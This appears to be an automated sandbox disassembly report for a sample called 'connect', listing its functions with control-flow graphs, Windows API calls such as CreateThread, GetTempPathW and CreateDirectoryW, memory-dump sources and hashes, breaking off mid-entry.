                                                            Uniqueness Score: -1.00%

                                                            Function 00402900 Relevance: 6.1, APIs: 4, Instructions: 101threadsynchronizationCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 911 402900-40293b call 40323d CreateThread 914 402960-40296d 911->914 915 40293d-402944 911->915 918 4029a2-4029ad 914->918 919 40296f-402972 914->919 916 402951-40295a WaitForSingleObject 915->916 917 402946-40294b call 4083d5 915->917 916->914 917->916 921 402a06 918->921 922 4029af-4029b1 918->922 923 402974-402977 919->923 924 402996 919->924 926 402a0b-402a0e 921->926 928 4029b3-4029c3 GetExitCodeThread 922->928 929 4029cd-4029d8 922->929 930 402992-402994 923->930 931 402979-40297c 923->931 925 402998-4029a0 call 409afd 924->925 925->921 928->929 933 4029c5-4029c7 928->933 934 4029da-4029dd 929->934 935 4029df-4029e5 929->935 930->925 936 40298e-402990 931->936 937 40297e-402981 931->937 933->929 939 4029c9-4029cb 933->939 940 40298b-40298c 934->940 943 4029f0-4029fc SetLastError 935->943 944 4029e7-4029ee 935->944 936->925 941 402983-402986 937->941 942 402988-402989 937->942 939->926 945 4029fe-402a03 call 409afd 940->945 941->921 941->942 942->940 943->945 944->921 944->943 945->921
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00002CD8,?,00000000,?), ref: 0040292B
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?,?), ref: 00402954
                                                            • GetExitCodeThread.KERNELBASE(00000000,?,?,00000000,?,?), ref: 004029B8
                                                            • SetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 004029F1
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Thread$CodeCreateErrorExitLastObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 2732711357-0
                                                            • Opcode ID: cb10d619cf2ab680e23a13bb2d3634a23182bcaf601ffd911dd3e2998509d960
                                                            • Instruction ID: 58ea0535a05782b0a44f655f21f23703f2f01dc76f16a7a514f10e5c7f21ff91
                                                            • Opcode Fuzzy Hash: cb10d619cf2ab680e23a13bb2d3634a23182bcaf601ffd911dd3e2998509d960
                                                            • Instruction Fuzzy Hash: BF31F4B1700215AADB348B159E8EA6B3669E781750F24863BF801F53E0D6F9C841EA6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403BE2 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000001,00000000,00000002), ref: 00403BFE
                                                            • GetTempPathW.KERNEL32(00000001,00000000,00000001), ref: 00403C21
                                                            • wsprintfW.USER32 ref: 00403C52
                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00403C6E
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: PathTemp$AttributesFilewsprintf
                                                            • String ID:
                                                            • API String ID: 1746483863-0
                                                            • Opcode ID: a80e3a81698b617920022f084417ce6a82f48dc66e349b337c01d07c3822e5fb
                                                            • Instruction ID: a1b551e8f7a8d9b312714c8086f5118f3e2773d6592d9aa994a5134f733c3406
                                                            • Opcode Fuzzy Hash: a80e3a81698b617920022f084417ce6a82f48dc66e349b337c01d07c3822e5fb
                                                            • Instruction Fuzzy Hash: 3C1106B2200614AFDB249F25D88086EBBADFF88354741403EFA0AE7290DB346D11C7D8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004057E3 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 987 4057e3-4057f4 CreateDirectoryW 988 405825-405827 987->988 989 4057f6-405803 GetLastError 987->989 992 405828-40582a 988->992 990 405810-40581c GetFileAttributesW 989->990 991 405805 989->991 990->988 994 40581e-405820 990->994 993 405806-40580e SetLastError 991->993 993->992 994->988 995 405822-405823 994->995 995->993
                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,?,004037E9,00000000,00000000,?,?,?,?,00402FA6,?,?), ref: 004057EC
                                                            • GetLastError.KERNEL32(?,004037E9,00000000,00000000,?,?,?,?,00402FA6,?,?), ref: 004057F6
                                                            • SetLastError.KERNEL32(000000B7,?,004037E9,00000000,00000000,?,?,?,?,00402FA6,?,?), ref: 00405806
                                                            • GetFileAttributesW.KERNELBASE(00000000,?,004037E9,00000000,00000000,?,?,?,?,00402FA6,?,?), ref: 00405813
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                            • String ID:
                                                            • API String ID: 635176117-0
                                                            • Opcode ID: 742d029769fec76a59fdf6fc964514f7013abc09cc89ef3447563f51d68903ac
                                                            • Instruction ID: 286c79d07375e42882360ca47a7462318b257a884f5f5e6ad8c68dcc896231c4
                                                            • Opcode Fuzzy Hash: 742d029769fec76a59fdf6fc964514f7013abc09cc89ef3447563f51d68903ac
                                                            • Instruction Fuzzy Hash: 28E06D32685604EBDA203B64AC0C75B3F59DB057A5F918532FD1AE81E0E33598225AAD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040440A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1224 40440a-404423 GetProcAddress 1225 404431-404434 1224->1225 1226 404425-404430 GetNativeSystemInfo 1224->1226
                                                            APIs
                                                            • GetProcAddress.KERNEL32(GetNativeSystemInfo), ref: 0040441B
                                                            • GetNativeSystemInfo.KERNELBASE(?,?,?,004026E0,?,0040218F,?,00000000), ref: 00404429
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: AddressInfoNativeProcSystem
                                                            • String ID: GetNativeSystemInfo
                                                            • API String ID: 2220751540-3949249589
                                                            • Opcode ID: 7ff82cbc69c9e933258b6048bd31102f18018c880fc3d2a3a615059d34584359
                                                            • Instruction ID: eaeacf6bb9b19dc556ea4ae534b47c773fb07c3d53b36bee6202c0f25c543307
                                                            • Opcode Fuzzy Hash: 7ff82cbc69c9e933258b6048bd31102f18018c880fc3d2a3a615059d34584359
                                                            • Instruction Fuzzy Hash: 1DD0A9303002085ACB24EBB1ED02AAA37E89A4CA087840570E802F00D0EABDED81E368
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403769 Relevance: 4.7, APIs: 3, Instructions: 153stringtimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1227 403769-4037a8 lstrlenW call 41146b call 404031 1232 4037aa-4037ad 1227->1232 1233 4037af-4037ba 1227->1233 1232->1233 1234 4037e3-4037ec call 4057e3 1232->1234 1233->1234 1237 4037bc-4037be 1234->1237 1238 4037ee-403801 GetSystemTimeAsFileTime GetFileAttributesW 1234->1238 1241 4037c0-4037c5 1237->1241 1242 4037db 1237->1242 1239 403803-403811 call 404399 1238->1239 1240 403817-403818 call 4057e3 1238->1240 1239->1240 1254 4038bc-4038cb call 419939 1239->1254 1249 40381d-403820 1240->1249 1245 4037c6-4037cd 1241->1245 1246 403838-40383f 1242->1246 1247 4037dd-4037df 1242->1247 1250 4037d9 1245->1250 1251 4037cf-4037d2 1245->1251 1252 403841-403850 1246->1252 1253 403859-40385a 1246->1253 1247->1234 1255 4038b2-4038b7 1249->1255 1256 403826 1249->1256 1250->1242 1251->1250 1257 4037d4-4037d7 1251->1257 1252->1253 1258 403852-403857 1252->1258 1259 403827-403833 call 409afd 1253->1259 1261 4038b9-4038bb 1255->1261 1262 40385c-403880 call 416ac0 1255->1262 1256->1259 1257->1245 1257->1250 1258->1253 1258->1261 1259->1254 1261->1254 1268 403896-40389f 1262->1268 1269 4038a1-4038b0 call 4057e3 1268->1269 1270 403882-40388b 1268->1270 1269->1255 1275 4038cc-4038db call 409afd 1269->1275 1270->1269 1271 40388d-403893 1270->1271 1271->1269 1273 403895 1271->1273 1273->1268 1275->1254
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,00000000,00000000,?,?,?,?,00402FA6,?,?), ref: 00403776
                                                            • GetSystemTimeAsFileTime.KERNEL32(00402FA6,00000000,?,?,?,?,00402FA6,?,?), ref: 004037F2
                                                            • GetFileAttributesW.KERNELBASE(00000000,?,?,?,00402FA6,?,?), ref: 004037F9
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: FileTime$AttributesSystemlstrlen
                                                            • String ID:
                                                            • API String ID: 692046673-0
                                                            • Opcode ID: 1fb4c1fadb55e38d2c1500d5aa9543c4b1b068a8c282553e5afd7018cff06221
                                                            • Instruction ID: a2b1e01e5b72138805d62356ac959b95482304870badc63da705cab1a7889ccf
                                                            • Opcode Fuzzy Hash: 1fb4c1fadb55e38d2c1500d5aa9543c4b1b068a8c282553e5afd7018cff06221
                                                            • Instruction Fuzzy Hash: 17411C76600206AADB20BF65C841AB77BECDF40755F50807BFD45A71C1E778CF424298
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404EC3 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 126stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenA.KERNEL32(00000000,?,00404AC4,?,?,?,?,00000000,00000000,?,?,00000000,?), ref: 00404EF7
                                                            • lstrlenA.KERNEL32(?,?,00404AC4,?,?,?,?,00000000,00000000,?,?,00000000,?), ref: 00404EFF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: x86
                                                            • API String ID: 1659193697-2105985432
                                                            • Opcode ID: c89c420ea53d7f28fbbc756a3206f21fb611187062e3faeb5e7255374ed344f4
                                                            • Instruction ID: 6bccced163320fcf1cb440c06350a2799d348d6a0af59ce35538f100fea6a6f2
                                                            • Opcode Fuzzy Hash: c89c420ea53d7f28fbbc756a3206f21fb611187062e3faeb5e7255374ed344f4
                                                            • Instruction Fuzzy Hash: 834152B1D0425A9FDB10DF69CC44BEFBBB8EF84344F04406AE804B7241E679DA45CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041E9CA Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0041EA16
                                                            • GetFileType.KERNELBASE(00000000), ref: 0041EA28
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: FileHandleType
                                                            • String ID:
                                                            • API String ID: 3000768030-0
                                                            • Opcode ID: b0fe165af819a37977b178bd6eec3e707dd721edbb7711092b6a98fe0bbd2afd
                                                            • Instruction ID: cea22e441615bec5daae5f6553f6f7952348c1caf38601312ab32f3b90ae0697
                                                            • Opcode Fuzzy Hash: b0fe165af819a37977b178bd6eec3e707dd721edbb7711092b6a98fe0bbd2afd
                                                            • Instruction Fuzzy Hash: E711E47951475146C7308A3F8CC86A37A94BF523B0B380B2BD8B7C66F1C339D8C29259
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402CD8 Relevance: 3.0, APIs: 2, Instructions: 45sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNEL32(00000014), ref: 00402CE8
                                                            • EndDialog.USER32(00000000,00000000), ref: 00402D45
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: DialogSleep
                                                            • String ID:
                                                            • API String ID: 2355613043-0
                                                            • Opcode ID: 7f281faf9ff11317ac50cd5bfdd93bb10e10a750ba57f70053ff6e923c83a31f
                                                            • Instruction ID: de90bda738dd8f93423cadb678a4f0ee15bcde19803547acaeefca108c5f98f6
                                                            • Opcode Fuzzy Hash: 7f281faf9ff11317ac50cd5bfdd93bb10e10a750ba57f70053ff6e923c83a31f
                                                            • Instruction Fuzzy Hash: DD018F32201210DFD7748B16DF0DA677769FB40761B5552BAE905AB6F0C3B8DC41CBA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004198F2 Relevance: 3.0, APIs: 2, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041A472
                                                              • Part of subcall function 0041795F: RaiseException.KERNEL32(?,?,?,0041A494,?,?,?,?,?,?,?,?,0041A494,0040126C,0042DD74,0040126C), ref: 004179BF
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041A48F
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3476068407-0
                                                            • Opcode ID: 6f896675ea5a4229c775ed26ef5a70175bd572cd42ac93d04ac4af3c57f2676e
                                                            • Instruction ID: 081aea13a5b5c2fcaccb962a289a0b86b797665bc5a11ef07633e85e67f7219a
                                                            • Opcode Fuzzy Hash: 6f896675ea5a4229c775ed26ef5a70175bd572cd42ac93d04ac4af3c57f2676e
                                                            • Instruction Fuzzy Hash: BBF0BB7081020D768B00B6B5E81A9DE777C5900328B50463BF924911D2EF7CABE985DE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00410258 Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0041026F
                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0041027C
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 2efc49608cd209d455171f2259a8696bcd3c8d09b9499b5a434c9c919b460d80
                                                            • Instruction ID: 913b5487961dc4f27969f4ef1a158cbc8a7cfa6adf5552ced201f2c87a827e7c
                                                            • Opcode Fuzzy Hash: 2efc49608cd209d455171f2259a8696bcd3c8d09b9499b5a434c9c919b460d80
                                                            • Instruction Fuzzy Hash: D5F05E75504218EBDF10DF69D804ADB7BE8EF09320B1181A6F816972A0D6319D91EBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00407C4C Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(00000010), ref: 00407C87
                                                            • GetSystemMetrics.USER32(00000011), ref: 00407C99
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherMetricsSystemUser
                                                            • String ID:
                                                            • API String ID: 365337688-0
                                                            • Opcode ID: dab63846cfb170731ee332e31864d88563b48c721149afb7b82a279b86ef9fc6
                                                            • Instruction ID: fda715761b55cd12d4bb332e0bd589d22bbdfe991fcdc7ffda579dec28641cd2
                                                            • Opcode Fuzzy Hash: dab63846cfb170731ee332e31864d88563b48c721149afb7b82a279b86ef9fc6
                                                            • Instruction Fuzzy Hash: A1F01DB0A04603DFC794CF39E905685BBF1BB48315745963BD519C2A90E7B4A0A58F84
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040B84C Relevance: 2.0, APIs: 1, Instructions: 501COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 03e9815ff0cc55ae9e01d1c5953ff4ec33af36563b86ba8af3f575059eda026e
                                                            • Instruction ID: 1425e2ae4f3325e7f5982e63cde3def45c25729aa66a1b70728b6a0e8332262f
                                                            • Opcode Fuzzy Hash: 03e9815ff0cc55ae9e01d1c5953ff4ec33af36563b86ba8af3f575059eda026e
                                                            • Instruction Fuzzy Hash: F8123A71A00209DFCB14DFA9C884AAEB7B5FF48314F24416AE905BB391DB35AD41CF98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040C9F9 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0040C9FE
                                                              • Part of subcall function 0040DB6A: __EH_prolog.LIBCMT ref: 0040DB6F
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 00ffca02ed19d82a8f0dd54cd17f2d332fe1e17e30c4331b8228106880939162
                                                            • Instruction ID: ded04732b7ca7f7bedce2c2e0f5075f28382ec03d4c412607ab088f34e023be7
                                                            • Opcode Fuzzy Hash: 00ffca02ed19d82a8f0dd54cd17f2d332fe1e17e30c4331b8228106880939162
                                                            • Instruction Fuzzy Hash: AD412C3170161ADFCB25DFA4C884F9AB7B8BF04704F04426AE909A7251DB34ED55CF94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0042001D Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041D85D: RtlAllocateHeap.NTDLL(00000008,0040126C,00000000,?,0041D5F7,00000001,00000364,00000006,000000FF,?,0041CFC8,0041DFEF,?,?,0041990C,?), ref: 0041D89E
                                                            • _free.LIBCMT ref: 00420089
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: b7413877cbfda83a37a5655c88cf64e534879104b46e028407b95268035cc8d8
                                                            • Instruction ID: 4fc720d3896346cfaf47cae79bd076c044a769ef3a5438def9c2e83076ea658f
                                                            • Opcode Fuzzy Hash: b7413877cbfda83a37a5655c88cf64e534879104b46e028407b95268035cc8d8
                                                            • Instruction Fuzzy Hash: 2F012B726003049BE3318F55A841A5BFBD9FB85370F65051EE59443281E634A845C76C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041D85D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,0040126C,00000000,?,0041D5F7,00000001,00000364,00000006,000000FF,?,0041CFC8,0041DFEF,?,?,0041990C,?), ref: 0041D89E
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 1db8dc718e8040e0b58127918f862e7fc54dc06279a56f0965c2560c4143d894
                                                            • Instruction ID: ca8c9f84f2627c8059d5a4d0ae20a873f78265cafbf5dd0b61adb93daf4d30c9
                                                            • Opcode Fuzzy Hash: 1db8dc718e8040e0b58127918f862e7fc54dc06279a56f0965c2560c4143d894
                                                            • Instruction Fuzzy Hash: 0BF0E072E44520AADB217B268C45FDB7748BF417B0B144177F82996698CE2CDC8186FC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040325C Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFileAttributesW.KERNELBASE(?,?), ref: 004032A8
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
